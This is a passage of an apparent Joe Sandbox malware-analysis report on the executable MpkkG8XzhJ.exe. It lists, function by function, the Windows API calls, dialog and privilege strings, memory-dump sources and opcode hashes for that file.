    • Opcode ID: f67eec39441d84cc6bdc76e30901bb7b6be9c47bcbf7e226032ed0d145d4127f
    • Instruction ID: d1d5283d977188c2045fd957733640faed35ed7cf503c469f8bfbc12ab755cae
    • Opcode Fuzzy Hash: f67eec39441d84cc6bdc76e30901bb7b6be9c47bcbf7e226032ed0d145d4127f
    • Instruction Fuzzy Hash: D7014432344B02ABE21227717C89E6B269A9FC3771321042BF904A2387EE388E419076
    APIs
    • _free.LIBCMT ref: 000DD9C7
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DD9D9
    • _free.LIBCMT ref: 000DD9EB
    • _free.LIBCMT ref: 000DD9FD
    • _free.LIBCMT ref: 000DDA0F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: a6655407054045ee33e2f1e288b7a27b4ce1790c1a9920d9af3e975503cd8c85
    • Instruction ID: 7842081cdc3c52e8a02420e0b32c68460ac79b5847526c2cc1b75d4f01caafc4
    • Opcode Fuzzy Hash: a6655407054045ee33e2f1e288b7a27b4ce1790c1a9920d9af3e975503cd8c85
    • Instruction Fuzzy Hash: 8FF0FF72A04300EBD660DB68E986C6673E9BB057117584C07F04CE7A42CB79FC808675
    APIs
    • _wcslen.LIBCMT ref: 000C3330
    • _wcslen.LIBCMT ref: 000C3341
    • _wcslen.LIBCMT ref: 000C3351
    • _wcslen.LIBCMT ref: 000C335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000BC844,?,?,00000000,?,?,?), ref: 000C337A
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 7e600d45696d34c2b84f8b0a6280d960bc357a98afeabcce4228b663901de82a
    • Instruction ID: 8a641ee59e5f8bab0d08e8f7c8d7fd0873391e79338089c630b3279459777921
    • Opcode Fuzzy Hash: 7e600d45696d34c2b84f8b0a6280d960bc357a98afeabcce4228b663901de82a
    • Instruction Fuzzy Hash: 1FF03033008254BFCF122F51DC09ECE3F26EB44B70B11C426F6195E162CE31D651DAA0
    APIs
    • _free.LIBCMT ref: 000D9CDE
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000D9CF0
    • _free.LIBCMT ref: 000D9D03
    • _free.LIBCMT ref: 000D9D14
    • _free.LIBCMT ref: 000D9D25
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ac8d2180760e2c3c720e6d1f9c996b0f42355753d1f8c814d7b0397e491dc860
    • Instruction ID: 2a89ce04aed048b3aff3f65fe1a811f6802b094eec30161515084b5e097dd929
    • Opcode Fuzzy Hash: ac8d2180760e2c3c720e6d1f9c996b0f42355753d1f8c814d7b0397e491dc860
    • Instruction Fuzzy Hash: 00F03AB4901220CFC60A6F14FE464943BA1F727B213058A17F11993BB2C77588C1DBA5
    APIs
      • Part of subcall function 000CB699: GetDC.USER32(00000000), ref: 000CB69D
      • Part of subcall function 000CB699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CB6A8
      • Part of subcall function 000CB699: ReleaseDC.USER32(00000000,00000000), ref: 000CB6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 000CB83C
      • Part of subcall function 000CBACE: GetDC.USER32(00000000), ref: 000CBAD7
      • Part of subcall function 000CBACE: GetObjectW.GDI32(?,00000018,?), ref: 000CBB06
      • Part of subcall function 000CBACE: ReleaseDC.USER32(00000000,?), ref: 000CBB9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: (
    • API String ID: 1061551593-3887548279
    • Opcode ID: ffd56bbea26762102a8f70d62364a768fbabfebefdde8bc0e9eaf6d5e23095a9
    • Instruction ID: 235bf26506d6f4e2b21e249f3833c8f00819bf808ed8997dbec2f312b741719d
    • Opcode Fuzzy Hash: ffd56bbea26762102a8f70d62364a768fbabfebefdde8bc0e9eaf6d5e23095a9
    • Instruction Fuzzy Hash: FA91DE71608750AFD620DF25C889E6BBBE9FFC9700F00491EF59AD7260DB31A845CB62
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: f6a058ad9375d03f3d50bd9e321ee9d4d5ddf7968eed0a1e8ea7491e30fbd4bd
    • Instruction ID: e1d80f46cfe746570bf0ac7a6811f155d3de30827d3968a698b3710ed98a38df
    • Opcode Fuzzy Hash: f6a058ad9375d03f3d50bd9e321ee9d4d5ddf7968eed0a1e8ea7491e30fbd4bd
    • Instruction Fuzzy Hash: 9A51A731688301FEEA352B94CC02FBE7655EB15B01F20450EF38BA5CE6C6B29950B71B
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MpkkG8XzhJ.exe,00000104), ref: 000D9360
    • _free.LIBCMT ref: 000D942B
    • _free.LIBCMT ref: 000D9435
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\MpkkG8XzhJ.exe
    • API String ID: 2506810119-3359158184
    • Opcode ID: 27d90cf6bf8b9cd50c2e6543b54b8a0e9e0bab5fcc37764cbaaf219301f3676a
    • Instruction ID: 75ab4f19bc0861ba7720fe07678234c9ab0269e9fbaae10b723435447e65135f
    • Opcode Fuzzy Hash: 27d90cf6bf8b9cd50c2e6543b54b8a0e9e0bab5fcc37764cbaaf219301f3676a
    • Instruction Fuzzy Hash: 873190B1A04348EBDB21DB99DC81DDEBBF8EB86710F104067F50497342D7708A41CBA1
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000D437B
    • _abort.LIBCMT ref: 000D4486
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 0d84dc15eea3de1283eec2d7651e0e925ae903a95bfd1e978c370c96dc6d5f9c
    • Instruction ID: 99ba10c32d57edc56cc33845073e3dab09ec80542c0fd4f7e92c1eb5af9acd33
    • Opcode Fuzzy Hash: 0d84dc15eea3de1283eec2d7651e0e925ae903a95bfd1e978c370c96dc6d5f9c
    • Instruction Fuzzy Hash: 5C414871900209AFCF15DF98CD81AEEBBB5BF48304F15815AF904B7362D3359A91DB61
    APIs
    • __EH_prolog.LIBCMT ref: 000B7F20
      • Part of subcall function 000B42F1: __EH_prolog.LIBCMT ref: 000B42F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000B7FE5
      • Part of subcall function 000B8704: GetCurrentProcess.KERNEL32(00000020,?), ref: 000B8713
      • Part of subcall function 000B8704: GetLastError.KERNEL32 ref: 000B8759
      • Part of subcall function 000B8704: CloseHandle.KERNEL32(?), ref: 000B8768
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: e2b528b10c7da54fa9f8cf06ea0d600327977d5b76381a12e397d377723c6636
    • Instruction ID: dd617a4272a00fa6da860aac0482a7eed03e6e17c413ace5362efd890d8a2148
    • Opcode Fuzzy Hash: e2b528b10c7da54fa9f8cf06ea0d600327977d5b76381a12e397d377723c6636
    • Instruction Fuzzy Hash: 3A31F431940249AEEF60EB649C06FFE7BADAB44354F004026F509B6192CE788E44DB61
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CBE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000CBE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 000CBE82
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: a3f0372d39e2a6998f1a44b029f4a81006a337e65293640678adacda70272480
    • Instruction ID: 32bbcbb7abe0585408013fa8f93505d66d52feb9134b548bc89cdfa8435f90eb
    • Opcode Fuzzy Hash: a3f0372d39e2a6998f1a44b029f4a81006a337e65293640678adacda70272480
    • Instruction Fuzzy Hash: 1511D032600611BFD7259FA8DE06FFE3BADEB4AF40F004019F740AB0A5C762995187A6
    APIs
    • __fprintf_l.LIBCMT ref: 000BEC74
    • _strncpy.LIBCMT ref: 000BECBA
      • Part of subcall function 000C30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000F3070,?,000BEC48,00000000,?,00000050,000F3070), ref: 000C3102
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 1d62420d4514d50cfb981e8b2844bc8a1464a671d4250c76cee432dcc78122a0
    • Instruction ID: 569c42d9677b2d1a03a62659770904dc3ddd5390c07298ba4d9baddf993471a5
    • Opcode Fuzzy Hash: 1d62420d4514d50cfb981e8b2844bc8a1464a671d4250c76cee432dcc78122a0
    • Instruction Fuzzy Hash: BB217F72540388AEEB20DFA4CD45FEF3FE8AF04700F140526FA159A292E771DA458BA1
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C21A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C21B8
    Strings
    • Thread pool initialization failed., xrefs: 000C21D0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: d781005cf5df9ecd8c67a1932a270e63f2a9e2ab8565cab0aabfdbf5cafc50e8
    • Instruction ID: 6c6aeec4877bf77bfcf8e2c1bb30fae43ba52b02645b0c229d03f35911b5c59e
    • Opcode Fuzzy Hash: d781005cf5df9ecd8c67a1932a270e63f2a9e2ab8565cab0aabfdbf5cafc50e8
    • Instruction Fuzzy Hash: 5711E7B1604708AFD3215F7A9CC4AABFBDCFB64744F18082EF6CAC7200D6705A408B60
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CC49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 000CC4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 000CC4E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: af1a90a23e27ccff5a94375b2e240c29e0bebaf94ed87cef079c78b79a893a09
    • Instruction ID: 955eaf1a3bfb2837d54d4f327971813628ede3770c04dcde8228ebf48f7398da
    • Opcode Fuzzy Hash: af1a90a23e27ccff5a94375b2e240c29e0bebaf94ed87cef079c78b79a893a09
    • Instruction Fuzzy Hash: C811C472A40128BAEB395B64DD59FFF7B6DEB49714F008168FB09F6480C27199429AA0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 3fe189522667b37606bc114a4882de63c8b88ab2860f1b431203b95e61e3adad
    • Instruction ID: 0b7927d168c769ce4011b1a3c8e805274791dbe4b396e838c7828cc27d95c950
    • Opcode Fuzzy Hash: 3fe189522667b37606bc114a4882de63c8b88ab2860f1b431203b95e61e3adad
    • Instruction Fuzzy Hash: 66015271604284AFE7118F59EC48FAF7FA5AB4A3D4B044029F50593670C6759890EBA1
    APIs
      • Part of subcall function 000BF608: _swprintf.LIBCMT ref: 000BF62E
      • Part of subcall function 000BF608: _strlen.LIBCMT ref: 000BF64F
      • Part of subcall function 000BF608: SetDlgItemTextW.USER32(?,000F0274,?), ref: 000BF6AF
      • Part of subcall function 000BF608: GetWindowRect.USER32(?,?), ref: 000BF6E9
      • Part of subcall function 000BF608: GetClientRect.USER32(?,?), ref: 000BF6F5
    • GetParent.USER32(?), ref: 000B132A
    • GetDlgItem.USER32(00000000,00003021), ref: 000B133A
    • SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    • Opcode ID: 4aeb8cd947a2b99550eb33b5e2b3f0335742f9eeae415df58464f1fd41e75863
    • Instruction ID: 98d18ce29a4dbad9d4a5adf6021f65fe68db3d5c9cd5d8abeeb6cc1fed87e56f
    • Opcode Fuzzy Hash: 4aeb8cd947a2b99550eb33b5e2b3f0335742f9eeae415df58464f1fd41e75863
    • Instruction Fuzzy Hash: 69F0AF3010864CBBDF660F21CC29BF93BD9BB02B84F448124FD44958A2EB78CA90EA10
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 000B495C
      • Part of subcall function 000CFD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000CFD19
      • Part of subcall function 000CFD0D: ___delayLoadHelper2@8.DELAYIMP ref: 000CFD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 000B4967
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    • Opcode ID: 4a522bbac5aed8924613bdbc89f06fe935fe69465a35f34790d4b2caa118db7e
    • Instruction ID: 6b284947467f22b38f5194295fbd545bdf08888d200a80d27ab2fabca1c5ab8a
    • Opcode Fuzzy Hash: 4a522bbac5aed8924613bdbc89f06fe935fe69465a35f34790d4b2caa118db7e
    • Instruction Fuzzy Hash: EAF030312003446B8624AF59FC85DCFB7EEEF85B54751092AFA85D7603DBB0EA0487B6
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 000CAC4B
    • RegisterClassExW.USER32(00000030), ref: 000CAC6C
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
